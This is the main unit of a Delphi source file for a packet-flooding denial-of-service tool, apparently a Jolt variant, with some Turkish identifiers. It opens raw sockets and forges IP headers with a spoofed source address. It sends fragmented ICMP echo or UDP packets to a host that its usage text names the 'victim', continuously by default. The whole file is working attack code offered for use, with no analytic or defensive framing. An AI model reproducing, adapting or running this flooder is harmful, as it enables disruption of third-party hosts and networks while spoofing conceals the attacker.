unit u_main;

interface

uses
  u_sysutils, u_winsck2, u_sockhdr;

type
  TAttackType = set of (TICMP, TUDP);
  TJoltOptions = packed record
    AttackType: TAttackType;
    Delay, Num, Sended, Source: Cardinal;
    HedefAdres: TSockAddrIn;
    Port: Word;
    RandomSeek: Integer;
    Socket: TSocket;
  end;

var
  jo: TJoltOptions;

  function GetRandomIP: Cardinal;
  function GetRandomValue(const Range: Integer): Integer;
  function Resolve(const host: PChar): Cardinal;
  procedure CreateSocket;
  procedure Jolt_FillIPhdr(const AttackType: TAttackType);
  procedure JoltICMP;
  procedure JoltUDP;
  procedure SetDefaultOptions;
  procedure SetParams;
  procedure Usage(const Path: string);

implementation

function GetRandomIP: Cardinal;
var
  IPArray: array [0..3] of Byte;
  i: Integer;
begin
  for i := 0 to 3 do
    IPArray[i] := GetRandomValue(255) + 1;
  Move(IPArray, Result, Sizeof(Result));
end;

function GetRandomValue(const Range: Integer): Integer; // function for getting different random
begin                                                   // values between very short times
  jo.RandomSeek := (jo.RandomSeek xor Range) + 1;
  Result := (Random(High(Integer)) xor jo.RandomSeek) mod Range;
end;

function Resolve(const host: PChar): Cardinal; // function for resolving host to ip
var
  InAddr: TInAddr;
  HostEnt: PHostEnt;
begin
  InAddr.S_addr := inet_addr(host); // convert ip address format (ex: 127.0.0.1) to cardinal
  if InAddr.S_addr = INADDR_NONE then // if it is not a ip address then resolve it
  begin
    HostEnt := GetHostByName(host);
    if not Assigned(HostEnt) then // if couldn't resolve the host then exit
    begin
      Writeln('Error: Unable to resolve host: ' + host);
      Halt(0);
    end;
    Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length); // move resolved host to InAddr.S_addr
  end;
  Result := InAddr.S_addr;
end;

procedure CreateSocket; // procedure for creating a raw socket
begin
  jo.Socket := Socket(AF_INET, SOCK_RAW, IPPROTO_RAW); // create a socket
  if jo.Socket = INVALID_SOCKET then // exit if couldn't create a socket
  begin
    Writeln('Error on creating socket');
    Halt(0);
  end;
  if SetSockOpt(jo.Socket, IPPROTO_IP, IP_HDRINCL, '1', 4) <> 0 then
  begin // if can't set the IP_HDRINCL option then exit
    Writeln('Error: IP_HDRINCL'#13#10 +
            '(Note that this program only works on Windows XP)');
    Halt(0);
  end;
end;

const
  Len = 29;

var
  Buf: array [0..Len - 1] of Char;
  IPhdr: PIPhdr = @Buf[0];
  ICMPhdr: PICMPhdr = @Buf[20];
  UDPhdr: PUDPhdr = @Buf[20];

procedure Jolt_FillIPhdr(const AttackType: TAttackType);
begin
  IPhdr.ip_verlen := $45;
  IPhdr.ip_tos := 0;
  IPhdr.ip_len := htons(28) + 40;
  IPhdr.ip_id := htons($455);
  IPhdr.ip_off := htons(8190);
  IPhdr.ip_ttl := 255;
  if TICMP in AttackType then
    IPhdr.ip_p := 1;
  if TUDP in AttackType then
    IPhdr.ip_p := 17;
  IPhdr.ip_src := jo.Source;
  IPhdr.ip_dst := jo.HedefAdres.sin_addr.S_addr;
  IPhdr.ip_sum := CheckSum(@IPhdr^, 20);
end;

procedure JoltICMP;
begin
  FillChar(Buf, Sizeof(Buf), 0);
  Jolt_FillIPhdr([TICMP]);
  ICMPhdr.icmp_type := 8;
  ICMPhdr.icmp_sum := CheckSum(@ICMPhdr^, Len - 8);
  Sendto(jo.Socket, Buf, Len, 0, jo.HedefAdres, Sizeof(jo.HedefAdres));
end;

procedure JoltUDP;
begin
  FillChar(Buf, Sizeof(Buf), 0);
  Jolt_FillIPhdr([TUDP]);
  UDPhdr.udp_sport := htons(jo.Port or 1235);
  UDPhdr.udp_dport := htons(jo.Port);
  UDPhdr.udp_ulen := htons(9);
  Buf[High(Buf)] := 'a';
  Sendto(jo.Socket, Buf, Len, 0, jo.HedefAdres, Sizeof(jo.HedefAdres));
end;

procedure SetDefaultOptions;
begin
  jo.AttackType := [TICMP];
  jo.HedefAdres.sin_addr.S_addr := Resolve(PChar(ParamStr(1)));
  jo.Source := Resolve(PChar(ParamStr(2)));
  jo.HedefAdres.sin_family := AF_INET;
  jo.HedefAdres.sin_port := GetRandomValue(High(Word)) + 1;
  jo.Port := 7;
end;

procedure SetParams; // procedure for setting optional parameters
var
  i, pcount: Integer;
  pstr: string;
  Ch: Char;
begin
  pcount := ParamCount;
  for i := 3 to pcount do
  begin
    pstr := ParamStr(i);
    Ch := #0;
    if Length(pstr) = 2 then
    begin
      if pstr[1] = '-' then
        Ch := pstr[2];
    end;
    if Ch = #0 then Continue;
    case Ch of
      'p': jo.Port := StrtoIntDef(ParamStr(i + 1), 7);
      'P':
        begin
          if LowerCase(ParamStr(i + 1)) = 'icmp' then
            jo.AttackType := [TICMP]
          else
            if LowerCase(ParamStr(i + 1)) = 'udp' then
              jo.AttackType := [TUDP]
            else
              if LowerCase(ParamStr(i + 1)) = 'both' then
                jo.AttackType := [TICMP, TUDP]
              else
              begin
                Writeln('Protocol must be icmp, udp or both');
                Halt(0);
              end;
        end;
      'n': jo.Num := StrtoIntDef(ParamStr(i + 1), 0);
      'd': jo.Delay := StrtoIntDef(ParamStr(i + 1), 0);
    end;
  end;
end;

procedure Usage(const Path: string);
begin
  Write(
        'usage: ' + Path + ' <victim> <spoof host> [options]'#13#10#13#10 +
        'Options:'#13#10 +
        '  -P:   Protocols to use. Either icmp, udp or both  (default icmp)'#13#10 +
        '  -p:   Dest port                                   (default 7)'#13#10 +
        '  -n:   Num of packets to send                      (0 is continuous (default))'#13#10 +
        '  -d:   Delay (in ms)                               (default 0)'#13#10
       );
  Halt(0);
end;

end.
